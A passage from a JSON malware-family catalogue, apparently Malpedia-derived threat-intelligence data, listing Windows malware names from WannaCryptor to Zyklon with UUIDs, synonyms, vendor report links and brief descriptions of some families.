"https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", "https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign", "https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/", "https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/", "http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/", "https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d" ], "synonyms": [ "Wana Decrypt0r", "WannaCry", "Wcry" ], "type": [] }, "uuid": "ad67ff31-2a02-43f9-8b12-7df7e4fcccd6", "value": "WannaCryptor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterminer", "https://blog.minerva-labs.com/waterminer-a-new-evasive-crypto-miner" ], "synonyms": [], "type": [] }, "uuid": "d536931e-ad4f-485a-b93d-fe05f23a9367", "value": "WaterMiner" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterspout", "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" ], "synonyms": [], "type": [] }, "uuid": "d238262a-4832-408f-9926-a7174e671b50", "value": "WaterSpout" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_adspace", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "e57c677f-0117-4e23-8c3f-a772ed809f4c", "value": "WebC2-AdSpace" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ausov", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "64f5ae85-1324-43de-ba3a-063785567be0", "value": "WebC2-Ausov" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_bolid", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "71292a08-9a7b-4df1-b1fd-7d80a8fcc18f", "value": "WebC2-Bolid" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_cson", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "5371bc44-dc07-4992-a3d7-c21705c50ac4", "value": "WebC2-Cson" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_div", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "acdda3e5-e776-419b-b060-14f3406de061", "value": "WebC2-DIV" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_greencat", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "cfed10ed-6601-469e-a1df-2d561b031244", "value": "WebC2-GreenCat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_head", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "f9f37707-36cf-4ad0-88e0-86f47cbe0ed6", "value": "WebC2-Head" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_kt3", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "15094548-7555-43ee-8c0d-4557d6d8a087", "value": "WebC2-Kt3" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_qbp", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "71d8ef43-3767-494b-afaa-f58aad70df65", "value": "WebC2-Qbp" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_rave", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "5350bf3a-26b0-49fb-a0b8-dd68933ea78c", "value": "WebC2-Rave" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_table", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "1035ea6f-6743-4e69-861c-454c19ec96ae", "value": "WebC2-Table" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ugx", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "b459033c-2d19-49aa-a21f-44a01d1a4156", "value": "WebC2-UGX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_yahoo", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "52c1518d-175c-4b39-bc7c-353d2ddf382e", "value": "WebC2-Yahoo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor", "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/" ], "synonyms": [], "type": [] }, "uuid": "fa3d196b-b757-49b7-a06d-77c77ac151c4", "value": "WebMonitor RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wellmess", "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html" ], "synonyms": [], "type": [] }, "uuid": "d84ebd91-58f6-459f-96a1-d028a1719914", "value": "WellMess" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wildfire", "https://labs.opendns.com/2016/07/13/wildfire-ransomware-gaining-momentum/" ], "synonyms": [], "type": [] }, "uuid": "2f512a73-6847-4231-81c6-8b51af8b5be2", "value": "WildFire" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winmm", "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "6a100902-7204-4f20-b838-545ed86d4428", "value": "WinMM" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti", "https://github.com/TKCERT/winnti-suricata-lua", "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", "https://github.com/TKCERT/winnti-nmap-script", "https://www.protectwise.com/blog/winnti-evolution-going-open-source.html", "https://github.com/TKCERT/winnti-detector", "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/" ], "synonyms": [], "type": [] }, "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1", "value": "Winnti (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winsloader", "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" ], "synonyms": [], "type": [] }, "uuid": "db755407-4135-414c-90e3-97f5e48c6065", "value": "Winsloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot", "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf" ], "synonyms": [], "type": [] }, "uuid": "6b6cf608-cc2c-40d7-8500-afca3e35e7e4", "value": "Wipbot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wmighost", "https://secrary.com/ReversingMalware/WMIGhost/", "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" ], "synonyms": [ "Syndicasec", "Wimmie" ], "type": [] }, "uuid": "892cb6c2-b96c-4f77-a9cf-4dd3d0c1cc40", "value": "WMI Ghost" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wndtest", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "d8bf4ea1-054c-4a88-aa09-48da0d89c322", "value": "WndTest" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wonknu", "https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/" ], "synonyms": [], "type": [] }, "uuid": "bfa75eb1-1d8d-4127-932f-3b7090a242e9", "value": "Wonknu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.woody", "https://www.sans.org/reading-room/whitepapers/malicious/detailed-analysis-advanced-persistent-threat-malware-33814" ], "synonyms": [], "type": [] }, "uuid": "42e23d17-8f1b-43c9-bc76-e3cf098b5c52", "value": "woody" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.woolger", "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf", "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" ], "synonyms": [ "WoolenLogger" ], "type": [] }, "uuid": "258751c7-1ddb-4df6-9a17-36b08c2cb267", "value": "Woolger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent", "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf" ], "synonyms": [ "chopstick", "splm" ], "type": [] }, "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", "value": "X-Agent (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbot_pos", "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html" ], "synonyms": [], "type": [] }, "uuid": "c6467cc3-dafd-482e-881e-ef2e7e244436", "value": "XBot POS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbtl" ], "synonyms": [], "type": [] }, "uuid": "fb3a8164-d8cb-495d-9b1c-57bed00c21ed", "value": "XBTL" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpan", "https://securelist.com/blog/research/78110/xpan-i-am-your-father/", "https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/" ], "synonyms": [], "type": [] }, "uuid": "4da036c4-b76d-4f25-bc9e-3c5944ad0993", "value": "Xpan" }, { "description": "Incorporates code of Quasar RAT.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpctra", "https://isc.sans.edu/forums/diary/XPCTRA+Malware+Steals+Banking+and+Digital+Wallet+Users+Credentials/22868/", "https://www.buguroo.com/en/blog/bank-malware-in-brazil-xpctra-rat-analysis" ], "synonyms": [ "Expectra" ], "type": [] }, "uuid": "5f9ba149-100a-46eb-a959-0645d872975b", "value": "XPCTRA" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xp_privesc", "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf" ], "synonyms": [], "type": [] }, "uuid": "33f97c52-0bcd-43f4-88bb-99e7da9f49ae", "value": "XP PrivEsc (CVE-2014-4076)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus", "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [ "nokian" ], "type": [] }, "uuid": "b255fd2c-6ddb-452f-b660-c9f5d3a2ff63", "value": "xsPlus" }, { "description": "X-Tunnel is a network proxy tool that implements a custom network protocol encapsulated in the TLS protocol.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel", "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/", "https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf", "https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", "http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf", "https://www.root9b.com/sites/default/files/whitepapers/R9b_FSOFACY_0.pdf" ], "synonyms": [ "xaps" ], "type": [] }, "uuid": "53089817-6d65-4802-a7d2-5ccc3d919b74", "value": "X-Tunnel" }, { "description": "This is a rewrite of win.xtunnel using the .NET framework that surfaced late 2017.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel_net", "https://www.ncsc.gov.uk/alerts/indicators-compromise-malware-used-apt28" ], "synonyms": [], "type": [] }, "uuid": "000e25a4-4623-4afc-883d-ecc15be8f9d0", "value": "X-Tunnel (.NET)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm", "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" ], "synonyms": [ "ShadowWalker" ], "type": [] }, "uuid": "1d451231-8b27-4250-b3db-55c5c8ea99cb", "value": "xxmm" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yahoyah", "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" ], "synonyms": [ "KeyBoy" ], "type": [] }, "uuid": "a673b4fb-a864-4a5b-94ab-3fc4f5606cc8", "value": "Yahoyah" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yayih", "https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html" ], "synonyms": [ "aumlib", "bbsinfo" ], "type": [] }, "uuid": "81157066-c2f6-4625-8070-c0a793d57e18", "value": "yayih" }, { "description": "Simple malware with proxy/RDP and download capabilities. It often comes bundled with installers, in particular in the Chinese realm.\r\n\r\nPE timestamps suggest that it came into existence in the second half of 2014.\r\n\r\nSome versions perform checks of the status of the internet connection (InternetGetConnectedState: MODEM, LAN, PROXY), some versions perform simple AV process-checks (CreateToolhelp32Snapshot).\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.younglotus", "https://www.youtube.com/watch?v=AUGxYhE_CUY" ], "synonyms": [ "DarkShare" ], "type": [] }, "uuid": "1cc9d450-88cd-435c-bb74-8410d2d22571", "value": "YoungLotus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yty", "https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/", "https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/" ], "synonyms": [], "type": [] }, "uuid": "c0e8b64c-bd2c-4a3e-addc-0ed6cc1ba200", "value": "yty" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy", "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" ], "synonyms": [ "Zekapab" ], "type": [] }, "uuid": "973124e2-0d84-4be5-9c8e-3ff16bb43b42", "value": "Zebrocy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy_au3", "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/" ], "synonyms": [], "type": [] }, "uuid": "4a5f2088-18cb-426a-92e2-1eb752c294c0", "value": "Zebrocy (AutoIT)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zedhou" ], "synonyms": [], "type": [] }, "uuid": "2211eade-4980-4143-acd7-5ecda26d9dfa", "value": "Zedhou" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroaccess", "http://contagiodump.blogspot.com/2010/11/zeroaccess-max-smiscer-crimeware.html", "http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/", "http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/", "https://blog.malwarebytes.com/threat-analysis/2013/08/sophos-discovers-zeroaccess-using-rlo/", "http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html", "http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/", "http://resources.infosecinstitute.com/zeroaccess-malware-part-2-the-kernel-mode-device-driver-stealth-rootkit/", "https://blog.malwarebytes.com/threat-analysis/2013/07/zeroaccess-anti-debug-uses-debugger/" ], "synonyms": [ "Max++", "Smiscer" ], "type": [] }, "uuid": "c7ff274f-2acc-4ee2-b74d-f1def12918d7", "value": "ZeroAccess" }, { "description": "ZeroEvil is a malware that seems to be distributed by an ARSguarded VBS loader.\r\n\r\nIt first connects to a gate.php (version=). Upon success, an embedded VBS gets started connecting to logs_gate.php (plugin=, report=).\r\nSo far, only one embedded VBS was observed: it creates and starts a PowerShell script to retrieve all password from the Windows.Security.Credentials.PasswordVault. Apart from that, a screenshot is taken and a list of running processes generated.\r\n\r\nThe ZeroEvil executable contains multiple DLLs, sqlite3.dll, ze_core.DLL (Mutex) and ze_autorun.DLL (Run-Key).\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroevil", "https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/" ], "synonyms": [], "type": [] }, "uuid": "585f9f75-1239-4561-8815-c5ae033053a1", "value": "ZeroEvil" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerot", "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx" ], "synonyms": [], "type": [] }, "uuid": "9b0aa458-dfa9-48af-87ea-c36d1501376c", "value": "ZeroT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus", "https://zeustracker.abuse.ch/monitor.php", "http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html", "http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html", "http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html", "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html", "http://eternal-todo.com/blog/new-zeus-binary", "http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html", "https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite", "https://nakedsecurity.sophos.com/2010/07/24/sample-run/", "https://www.mnin.org/write/ZeusMalware.pdf", "https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20", "http://malwareint.blogspot.com/2010/01/leveraging-zeus-to-send-spam-through.html", "http://eternal-todo.com/blog/zeus-spreading-facebook", "http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf", "http://eternal-todo.com/blog/detecting-zeus", "https://www.secureworks.com/research/zeus?threat=zeus", "http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html" ], "synonyms": [ "Zbot" ], "type": [] }, "uuid": "4e8c1ab7-2841-4823-a5d1-39284fb0969a", "value": "Zeus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_mailsniffer" ], "synonyms": [], "type": [] }, "uuid": "768f1ae5-81a6-49f2-87c1-821c247b4bf3", "value": "Zeus MailSniffer" }, { "description": "This family describes the Zeus-variant that includes a version of OpenSSL and usually is downloaded by Zloader.\r\n\r\nIn June 2016, the version 1.5.4.0 (PE timestamp: 2016.05.11) appeared, downloaded by Zloader (known as DEloader at that time). OpenSSL 1.0.1p is statically linked to it, thus its size is roughly 1.2 MB. In subsequent months, that size increased up to 1.6 MB.\r\nIn January 2017, with version 1.14.8.0, OpenSSL 1.0.2j was linked to it, increasing the size to 1.8 MB. Soon after also in January 2017, with version v1.15.0.0 the code was obfuscated, blowing up the size of the binary to 2.2 MB.\r\n\r\nPlease note that IBM X-Force decided to call win.zloader/win.zeus_openssl \"Zeus Sphinx\", after mentioning it as \"a new version of Zeus Sphinx\" in their initial post in August 2016. Malpedia thus lists the alias \"Zeus XSphinx\" for win.zeus_openssl - the X to refer to IBM X-Force.\r\n\r\nZeus Sphinx on the one hand has the following versioning (\"slow increase\")\r\n- 2015/09 v1.0.1.0 (Zeus Sphinx size: 1.5 MB)\r\n- 2016/02 v1.0.1.2 (Zeus Sphinx size: 1.5 MB)\r\n- 2016/04 v1.0.2.0 (Zeus Sphinx size: 1.5 MB)\r\n\r\nZeus OpenSSL on the other hand has the following versioning (\"fast increase\")\r\n- 2016/05 v1.5.4.0 (Zeus OpenSSL size: 1.2 MB)\r\n- 2017/01 v1.14.8.0 (Zeus OpenSSL size: 1.8 MB)\r\n- 2017/01 v1.15.0.0 (Zeus OpenSSL size: 2.2 MB)", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_openssl", "https://asert.arbornetworks.com/great-dga-sphinx/", "https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/", "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/" ], "synonyms": [ "XSphinx" ], "type": [] }, "uuid": "74fc6a3a-cc51-4065-bdd9-fcef18c988a0", "value": "Zeus OpenSSL" }, { "description": "This family describes the vanilla Zeus-variant that includes TOR (and Polipo proxy). It has an almost 90% overlap with Zeus v2.0.8.9.\r\nPlease note that IBM X-Force decided to call win.zloader/win.zeus_openssl \"Zeus Sphinx\", after mentioning it as \"a new version of Zeus Sphinx\" in their initial post in August 2016. Malpedia thus lists the alias \"Zeus XSphinx\" for win.zeus_openssl - the X to refer to IBM X-Force.\r\n\r\nZeus Sphinx on the one hand has the following versioning (\"slow increase\")\r\n- 2015/09 v1.0.1.0 (Zeus Sphinx size: 1.5 MB)\r\n- 2016/02 v1.0.1.2 (Zeus Sphinx size: 1.5 MB)\r\n- 2016/04 v1.0.2.0 (Zeus Sphinx size: 1.5 MB)\r\n\r\nZeus OpenSSL on the other hand has the following versioning (\"fast increase\")\r\n- 2016/05 v1.5.4.0 (Zeus OpenSSL size: 1.2 MB)\r\n- 2017/01 v1.14.8.0 (Zeus OpenSSL size: 1.8 MB)\r\n- 2017/01 v1.15.0.0 (Zeus OpenSSL size: 2.2 MB)", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_sphinx", "https://securityaffairs.co/wordpress/39592/cyber-crime/sphinx-variant-zeus-trojan.html", "https://web.archive.org/web/20160130165709/http://darkmatters.norsecorp.com/2015/08/24/sphinx-new-zeus-variant-for-sale-on-the-black-market/" ], "synonyms": [], "type": [] }, "uuid": "997c20b0-0992-498a-b69d-fc16ab2fd4e4", "value": "Zeus Sphinx" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zezin", "https://twitter.com/siri_urz/status/923479126656323584", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4877" ], "synonyms": [], "type": [] }, "uuid": "38de079b-cc4c-47b0-b47f-ad4c013d8a1f", "value": "Zezin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhcat", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "3c74a04d-583e-40ec-b347-bdfeb534c614", "value": "ZhCat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhmimikatz", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "989330e9-52da-4489-888b-686429db3a45", "value": "ZhMimikatz" }, { "description": "This family describes the (initially small) loader, which downloads Zeus OpenSSL.\r\n\r\nIn June 2016, a new loader was dubbed DEloader by Fortinet. It has some functions borrowed from Zeus 2.0.8.9 (e.g. the versioning, nrv2b, binstorage-labels), but more importantly, it downloaded a Zeus-like banking trojan (-> Zeus OpenSSL). Furthermore, the loader shared its versioning with the Zeus OpenSSL it downloaded.\r\nThe initial samples from May 2016 were small (17920 bytes). At some point, visualEncrypt/Decrypt was added, e.g. in v1.11.0.0 (September 2016) with size 27648 bytes. In January 2017 with v1.15.0.0, obfuscation was added, which blew the size up to roughly 80k, and the loader became known as Zloader aka Terdot. These changes may be related to the Moskalvzapoe Distribution Network, which started the distribution of it at the same time.\r\n\r\nPlease note that IBM X-Force decided to call win.zloader/win.zeus_openssl \"Zeus Sphinx\", after mentioning it as \"a new version of Zeus Sphinx\" in their initial post in August 2016. Malpedia thus lists the alias \"Zeus XSphinx\" for win.zeus_openssl - the X to refer to IBM X-Force.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zloader", "https://www.fortinet.com/blog/threat-research/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users.html", "https://securityintelligence.com/around-the-world-with-zeus-sphinx-from-canada-to-australia-and-back/", "https://www.forcepoint.com/blog/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks", "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/", "https://int0xcc.svbtle.com/dissecting-obfuscated-deloader-malware", "https://securityintelligence.com/zeus-sphinx-pushes-empty-configuration-files-what-has-the-sphinx-got-cooking/" ], "synonyms": [ "DELoader", "Terdot" ], "type": [] }, "uuid": "13236f94-802b-4abc-aaa9-cb80cf4df9ed", "value": "Zloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zoxpng", "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf" ], "synonyms": [ "gresim" ], "type": [] }, "uuid": "7078d273-8a2d-477a-b6d9-7313e22d9ad7", "value": "ZoxPNG" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zxshell", "https://github.com/smb01/zxshell", "https://blogs.cisco.com/security/talos/opening-zxshell", "https://blogs.rsa.com/cat-phishing/" ], "synonyms": [ "Sensocode" ], "type": [] }, "uuid": "23920e3b-246a-4172-bf9b-5e9f90510a15", "value": "ZXShell" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zyklon", "https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html", "https://blog.talosintelligence.com/2017/05/modified-zyklon-and-plugins-from-india.html", "https://asert.arbornetworks.com/wp-content/uploads/2017/05/zyklon_season.pdf" ], "synonyms": [], "type": [] }, "uuid": "721e9af0-8a60-4b9e-9137-c23e86d75722", "value": "Zyklon" } ], "version": 1838 }